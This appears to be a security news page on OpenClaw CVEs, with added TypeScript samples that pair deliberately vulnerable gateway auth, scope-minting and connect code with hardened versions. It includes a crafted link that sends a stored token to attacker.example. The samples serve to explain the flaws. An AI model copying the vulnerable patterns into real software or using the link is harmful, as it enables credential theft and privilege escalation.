OpenClaw Flaws Allowed Authentication Bypass and Admin Privilege Escalation
OpenClaw disclosed high-severity vulnerabilities, fixed in versions 2026.2.21 and 2026.3.25, that exposed gateway routes to unauthorized access and privilege escalation. CVE-2026-32045 is an authentication bypass in HTTP gateway routes caused by incorrect application of tokenless Tailscale header authentication: an attacker who can reach the gateway from a trusted network could reach protected routes without a valid token or password. The issue is tracked as CWE-290 (authentication bypass by spoofing) and carries a CVSS v3.1 vector of AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N, a confidentiality-only impact whose high attack-complexity component reflects the trusted-network precondition.
Timeline
Apr 10, 2026
CVE-2026-35663 publicly disclosed
A high-severity OpenClaw vulnerability, CVE-2026-35663, was publicly disclosed affecting versions before 2026.3.25. The privilege escalation flaw in the backend reconnect process allowed non-admin operators to self-request broader scopes, bypass pairing requirements, and reconnect as operator.admin.
Apr 10, 2026
CVE-2026-35669 publicly disclosed
CVE-2026-35669 was publicly disclosed on April 10, 2026 as a high-severity OpenClaw privilege escalation vulnerability. It was classified as CWE-648 (incorrect use of privileged APIs) and described as allowing a low-privileged attacker to obtain the operator.admin runtime scope and perform unauthorized actions.
Apr 10, 2026
VulnCheck receives disclosure for CVE-2026-35669
The privilege escalation vulnerability later assigned CVE-2026-35669 was received by disclosure@vulncheck.com on April 10, 2026. The flaw involved improper authentication scope handling in OpenClaw plugin HTTP routes.
Mar 25, 2026
OpenClaw fixes privilege escalation in version 2026.3.25
OpenClaw addressed CVE-2026-35669 in version 2026.3.25, fixing a privilege escalation flaw in gateway-authenticated plugin HTTP routes that incorrectly minted the operator.admin runtime scope. The bug affected versions before 2026.3.25 and could let low-privileged users gain elevated administrative capabilities.
Mar 21, 2026
CVE-2026-32045 publicly disclosed
A high-severity vulnerability, CVE-2026-32045, was disclosed for OpenClaw on March 21, 2026. The issue was classified as CWE-290 and described as enabling unauthorized access to HTTP gateway routes without valid authentication credentials.
Feb 21, 2026
OpenClaw fixes authentication bypass in version 2026.2.21
OpenClaw addressed CVE-2026-32045 in version 2026.2.21, fixing an authentication bypass in HTTP gateway routes caused by incorrect application of tokenless Tailscale header authentication. The flaw affected versions prior to 2026.2.21 and could allow attackers on trusted networks to access routes without valid tokens or passwords.
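The following is an added illustration of the CWE-290 pattern described above, not OpenClaw's code. It assumes a gateway that accepts either a shared token or, only when the operator has enabled tokenless mode, identity headers stamped by a Tailscale proxy that forwards from loopback; the header name, config flag and sample values are assumptions. The vulnerable variant applies the header check to every peer and every route; the hardened variant only honours it when the mode is on and the request demonstrably came through the proxy.

```typescript
// Added illustration of CWE-290 in a gateway auth check; not OpenClaw's code.
// Assumed model: the gateway accepts a shared token, or, only when the operator has
// enabled tokenless mode, identity headers stamped by a Tailscale proxy that forwards
// from loopback. Header and config names below are assumptions.

type GatewayConfig = {
  token?: string;               // shared gateway token, if configured
  tailscaleHeaderAuth: boolean; // opt-in tokenless mode (assumed flag name)
};

type GatewayRequest = {
  path: string;
  headers: { [name: string]: string }; // header names lower-cased
  remoteAddr: string;                  // peer address the gateway socket actually sees
};

type AuthResult =
  | { ok: true; principal: string; method: "token" | "tailscale" }
  | { ok: false; reason: string };

// Assumed header name. Any client that can reach the listener can set it, so it
// proves nothing unless the request is known to have come through the proxy.
const TAILSCALE_LOGIN_HEADER = "tailscale-user-login";
const LOOPBACK_PEERS = ["127.0.0.1", "::1", "::ffff:127.0.0.1"];

// Constant-time comparison so the token check does not leak a matching prefix by timing.
function constantTimeEqual(a: string, b: string): boolean {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

function tokenAuth(req: GatewayRequest, cfg: GatewayConfig): AuthResult {
  const presented = (req.headers["authorization"] || "").replace(/^Bearer\s+/i, "");
  if (cfg.token && presented && constantTimeEqual(presented, cfg.token)) {
    return { ok: true, principal: "token-holder", method: "token" };
  }
  return { ok: false, reason: "missing or invalid token" };
}

// VULNERABLE: tokenless header auth is applied on every route and for every peer,
// whether or not the mode is enabled, so a spoofed header alone unlocks the route.
function authorizeVulnerable(req: GatewayRequest, cfg: GatewayConfig): AuthResult {
  const login = req.headers[TAILSCALE_LOGIN_HEADER];
  if (login) return { ok: true, principal: login, method: "tailscale" };
  return tokenAuth(req, cfg);
}

// HARDENED: identity headers count only when the mode is on and the peer is the
// local proxy trusted to set them; everything else must present the token.
function authorizeHardened(req: GatewayRequest, cfg: GatewayConfig): AuthResult {
  const login = req.headers[TAILSCALE_LOGIN_HEADER];
  const viaProxy = LOOPBACK_PEERS.indexOf(req.remoteAddr) !== -1;
  if (cfg.tailscaleHeaderAuth && viaProxy && login) {
    return { ok: true, principal: login, method: "tailscale" };
  }
  return tokenAuth(req, cfg);
}

// Constructed sample: a LAN peer forging the identity header with no token.
const CONFIG: GatewayConfig = { token: "constructed-gateway-token", tailscaleHeaderAuth: false };
const SPOOFED: GatewayRequest = {
  path: "/api/admin/config",
  headers: { "tailscale-user-login": "alice@example.com" },
  remoteAddr: "192.168.1.50",
};

console.log("vulnerable:", authorizeVulnerable(SPOOFED, CONFIG)); // accepted
console.log("hardened:  ", authorizeHardened(SPOOFED, CONFIG));   // rejected
```

The loopback check stands in for whatever proof a deployment has that the proxy, and only the proxy, can reach the listener; the proxy must also strip any identity headers a client sends inbound, otherwise a peer that can reach the proxy can still forge them.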
Related Stories

OpenClaw Flaws Let Authenticated Users Escalate Privileges and Bypass Authorization
Two high-severity vulnerabilities in OpenClaw exposed paths for authenticated users to gain access beyond their intended roles. **CVE-2026-32042** affects versions before `2026.2.25` and allows an attacker with valid shared gateway authentication to present a self-signed, unpaired device identity and bypass pairing requirements, then self-assign elevated operator scopes including `operator.admin`. The issue is classified as `CWE-863` (incorrect authorization) and effectively turns a trusted but unapproved device identity into a route for privilege escalation. A second flaw, **CVE-2026-32051**, affects OpenClaw versions before `2026.3.1` and allows users with `operator.write` scope to reach owner-only tool surfaces such as gateway and cron through agent runs in scoped-token deployments. The authorization mismatch lets lower-privileged authenticated users perform control-plane actions that should be restricted to owners, creating high risk to confidentiality, integrity, and availability. Advisories for both issues point to fixes and security guidance through GitHub and VulnCheck.
1 week ago
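The following is an added illustration of the scope-minting pattern shared by the reconnect and plugin-route escalations in the timeline above and by CVE-2026-32042 and CVE-2026-32051 in this story; it is not OpenClaw's code. It assumes a model in which a device pairs once, the server records the scopes granted at pairing, a reconnect may only narrow those scopes, and gateway and cron are owner-only tool surfaces gated on `operator.admin`. Scope names, device ids and the tool policy table are assumptions. Each vulnerable function trusts something the client supplied (its pairing claim, its requested scopes, or "the run is already authenticated"); each hardened counterpart re-derives that from server-side state.

```typescript
// Added illustration of the scope-minting pattern behind the operator.admin escalations;
// not OpenClaw's code. Assumed model: a device pairs once, the server records the scopes
// granted at pairing, reconnects may only narrow them, and gateway/cron are owner-only
// tool surfaces gated on operator.admin. All names below are assumptions.

type Scope = "operator.read" | "operator.write" | "operator.admin";
const SCOPE_RANK: Record<Scope, number> = { "operator.read": 1, "operator.write": 2, "operator.admin": 3 };

type PairedDevice = { deviceId: string; grantedScopes: Scope[] };

// Server-side pairing registry (constructed sample): one approved device, write-scoped.
const PAIRED: { [deviceId: string]: PairedDevice } = {
  "ops-laptop": { deviceId: "ops-laptop", grantedScopes: ["operator.read", "operator.write"] },
};

type ReconnectRequest = {
  deviceId: string;
  claimsPaired: boolean;    // asserted by the client; a self-signed, unpaired identity can claim true
  requestedScopes: Scope[]; // also chosen by the client
};

type Session = { deviceId: string; scopes: Scope[] } | null;

// VULNERABLE: trusts the client's pairing claim and mints exactly the scopes it asked for.
function reconnectVulnerable(req: ReconnectRequest): Session {
  if (!req.claimsPaired) return null;
  return { deviceId: req.deviceId, scopes: req.requestedScopes };
}

// HARDENED: pairing state comes from the server record, and the requested scopes are
// intersected with what pairing actually granted; unknown devices get nothing.
function reconnectHardened(req: ReconnectRequest): Session {
  const record = PAIRED[req.deviceId];
  if (!record) return null;
  const scopes = req.requestedScopes.filter((s) => record.grantedScopes.indexOf(s) !== -1);
  if (scopes.length === 0) return null;
  return { deviceId: req.deviceId, scopes };
}

// Minimum scope per tool surface (assumed policy; gateway and cron are owner-only).
const TOOL_MIN_SCOPE: { [tool: string]: Scope } = {
  web_search: "operator.read",
  file_write: "operator.write",
  gateway: "operator.admin",
  cron: "operator.admin",
};

function hasScope(scopes: Scope[], needed: Scope): boolean {
  return scopes.some((s) => SCOPE_RANK[s] >= SCOPE_RANK[needed]);
}

// VULNERABLE: inside an agent run, tool calls inherit "the run is authenticated" and
// skip the per-tool check, so operator.write reaches owner-only surfaces.
function canInvokeToolVulnerable(session: Session, tool: string): boolean {
  return session !== null && TOOL_MIN_SCOPE[tool] !== undefined;
}

// HARDENED: every invocation, agent-run or not, is checked against the session's scopes.
function canInvokeToolHardened(session: Session, tool: string): boolean {
  if (session === null) return false;
  const needed = TOOL_MIN_SCOPE[tool];
  return needed !== undefined && hasScope(session.scopes, needed);
}

// Constructed requests: an unpaired device asking for admin outright, and the paired
// write-scoped device asking for more than it was granted.
const ROGUE: ReconnectRequest = { deviceId: "rogue", claimsPaired: true, requestedScopes: ["operator.admin"] };
const GREEDY: ReconnectRequest = {
  deviceId: "ops-laptop",
  claimsPaired: true,
  requestedScopes: ["operator.write", "operator.admin"],
};

console.log("rogue, vulnerable:", reconnectVulnerable(ROGUE)); // admin session minted
console.log("rogue, hardened:  ", reconnectHardened(ROGUE));   // null
console.log("greedy, hardened: ", reconnectHardened(GREEDY));  // scopes: ["operator.write"]
console.log("cron with write:  ", canInvokeToolHardened(reconnectHardened(GREEDY), "cron")); // false
```

The point of intersecting rather than validating the request is that a client never gets to name a scope it was not granted, so there is no "requested scope" code path to get wrong; the tool check is repeated at invocation time because the scope an agent run was started with, not the fact that it was started, is what authorizes each tool call.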
OpenClaw SSRF Flaws Expose Internal Services Through Citation Redirects and Image Fetches
OpenClaw disclosed two high-severity server-side request forgery vulnerabilities affecting versions prior to `2026.3.1` and `2026.3.28`. **CVE-2026-32902** impacts `web_search` citation redirect resolution, where attacker-influenced redirect targets can cause the OpenClaw gateway host to send requests to private-network destinations. The issue is tracked as `CWE-918` and was assigned a CVSS v3.1 vector of `AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L`, indicating remote exploitation without privileges or user interaction, with changed scope because the requests originate from the gateway host's network position rather than the attacker's.
1 month ago
OpenClaw Vulnerability Enables Token Exfiltration and One-Click RCE via Malicious Link
A high-severity flaw in **OpenClaw** (also known as *Clawdbot* / *Moltbot*) enables **one-click remote code execution (RCE)** by abusing how the Control UI auto-connects to a gateway specified via a crafted URL. The issue is tracked as **CVE-2026-25253** (CVSS **8.8**) and was fixed in **OpenClaw 2026.1.29**; the core weakness is that the UI trusts `gatewayUrl` from the query string and sends a stored gateway token in the WebSocket connection payload, allowing **token exfiltration** to an attacker-controlled server. With the stolen token, an attacker can connect to the victim’s local gateway and perform privileged actions—such as modifying configuration (e.g., sandbox/tool policies) and invoking privileged operations—resulting in **full gateway compromise** and RCE. Separate reporting also highlights architectural risk in OpenClaw’s local WebSocket-based Chrome orchestration, noting that (prior to patching) unauthenticated connections could be initiated from JavaScript running in a user’s browser, enabling cross-tab/session credential theft; users are advised to **patch immediately** and be cautious about deployment given ongoing security concerns.
1 month ago
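The following is an added illustration of why a gateway endpoint taken from the page URL must be validated before a stored token is sent to it; it is not OpenClaw's Control UI code. The default local gateway origin, the query parameter name and the connect message shape are assumptions. The vulnerable variant reproduces the weakness in the story (the URL from `?gatewayUrl=` becomes the WebSocket target and the stored token rides in the first message); the hardened variant only auto-connects to an origin on a user-approved allow-list, and otherwise connects to nothing at all.

```typescript
// Added illustration of validating a URL-supplied gateway endpoint before a stored token
// is sent to it; not OpenClaw's Control UI code. The default gateway origin, the query
// parameter name and the connect message shape are assumptions.

const DEFAULT_GATEWAY = "ws://127.0.0.1:18789";   // assumed default local gateway origin
const STORED_TOKEN = "constructed-gateway-token"; // constructed sample secret

type ConnectPlan = { url: string; payload: { type: "connect"; token?: string } } | null;

function tryParseUrl(raw: string): URL | null {
  try { return new URL(raw); } catch { return null; }
}

// VULNERABLE: whatever ?gatewayUrl= says becomes the WebSocket target and the stored
// token rides along in the first message, so a crafted link exfiltrates the token.
function planConnectVulnerable(search: string): ConnectPlan {
  const url = new URLSearchParams(search).get("gatewayUrl") || DEFAULT_GATEWAY;
  return { url, payload: { type: "connect", token: STORED_TOKEN } };
}

// HARDENED: only ws/wss URLs whose origin is on the user's allow-list are auto-connected.
// Anything else yields no connection at all (not a connection without a token), since
// an attacker-controlled endpoint must never see the token or an authenticated session.
function planConnectHardened(search: string, allowedOrigins: string[]): ConnectPlan {
  const raw = new URLSearchParams(search).get("gatewayUrl");
  if (raw === null) return { url: DEFAULT_GATEWAY, payload: { type: "connect", token: STORED_TOKEN } };
  const u = tryParseUrl(raw);
  if (!u || (u.protocol !== "ws:" && u.protocol !== "wss:")) return null;
  // Build the origin from the parsed protocol and host instead of prefix-matching the
  // string, so "ws://127.0.0.1:18789@attacker.example/" (userinfo trick) is seen for
  // what it is: a connection to attacker.example.
  const origin = u.protocol + "//" + u.host;
  if (allowedOrigins.indexOf(origin) === -1) return null;
  return { url: u.toString(), payload: { type: "connect", token: STORED_TOKEN } };
}

const ALLOWED = [DEFAULT_GATEWAY];
const CRAFTED_LINK = "?gatewayUrl=wss://attacker.example/ws"; // constructed one-click link

console.log("vulnerable:", planConnectVulnerable(CRAFTED_LINK));      // token goes to attacker.example
console.log("hardened:  ", planConnectHardened(CRAFTED_LINK, ALLOWED)); // null
```

Refusing to connect, rather than connecting without the token, is deliberate: a UI that still opens a session to an arbitrary endpoint can be steered into other mischief later, and the user gets a clear failure instead of a silently redirected gateway.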